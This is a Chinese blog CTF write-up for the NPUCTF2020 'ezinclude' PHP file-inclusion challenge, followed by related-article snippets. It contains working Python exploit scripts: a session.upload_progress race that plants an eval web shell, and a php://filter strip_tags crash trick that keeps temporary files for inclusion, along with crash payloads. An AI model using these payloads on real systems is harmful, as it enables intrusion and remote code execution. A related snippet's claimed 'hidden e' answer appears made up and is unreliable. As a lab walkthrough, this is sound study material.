[NPUCTF2020]ezinclude

最新推荐文章于 2022-01-09 14:17:22 发布
最新推荐文章于 2022-01-09 14:17:22 发布
阅读量2.6k 收藏 3
点赞数 5
分类专栏: 文件包含 文章标签: web 文件包含 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/114656092
版权

WP

进入环境,说用户名或者密码错误。抓包看一下,疑似哈希长度拓展攻击:
在这里插入图片描述
但是长度不知道,爆破的可能性不大,想了一下突然想起来给了hash值了,我还想着去长度拓展攻击呢,所以直接pass传一下:
在这里插入图片描述
进入flflflflag.php,发现是个文件包含。

include($_GET["file"])

伪协议读一下源码:

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

过滤了data和input,没法直接命令执行。长度远程包含发现不行,再尝试包含apache的日志文件,也不行。

这里我利用的是非预期解了。看了一下php版本是7.0.33,大于5.4,可以尝试利用session.upload_progress进行session文件包含:

import io
import sys
import requests
import threading

host = 'http://4da37c54-0605-4773-b4a7-11235251b69c.node3.buuoj.cn/flflflflag.php'
sessid = 'feng'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('ls /');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

写进shell.php,执行phpinfo即可找到flag。

预期解的话就是扫目录,可以发现dir.php。这个列出了/tmp下面的所有文件。
可以用php7 segment fault特性。

向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留

  • php < 7.2
    php://filter/string.strip_tags/resource=/etc/passwd

  • php7 老版本通杀
    php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA

写个脚本:

import requests
from io import BytesIO
url="http://f0af8aa4-9e9c-40a8-9003-175dbc6f69f8.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload="<?php phpinfo();?>"
files={
    "file":BytesIO(payload.encode())
}
r=requests.post(url=url,files=files,allow_redirects=False)

print(r.text)

再访问dir.php,可以看到临时文件名:
在这里插入图片描述
再文件包含即可:
在这里插入图片描述

bfengj
关注
专栏目录
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 769
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
[NPUCTF2020]ezinclude ---不会编程的崽
最新发布
不会编程的崽的博客
02-25 812
php://filter/string.strip_tags导致php崩溃清空堆栈重启
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3086
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1187
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
[NPUCTF2020]ezinclude 1
Kradress的博客
12-08 3247
目录源码思路总结 源码 username/password error<html> <!--md5($secret.$name)===$pass --> </html> 思路 根据提示,先抓个包发现cookie里面有值 Hash=fa25e54758d5d5c1927781a6ede89f8a 根据md5($secret.$name)===$pass猜得这个应该为name的md5加密后的值,所以pass=fa25e54758d5d5c1927781a6ede89
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值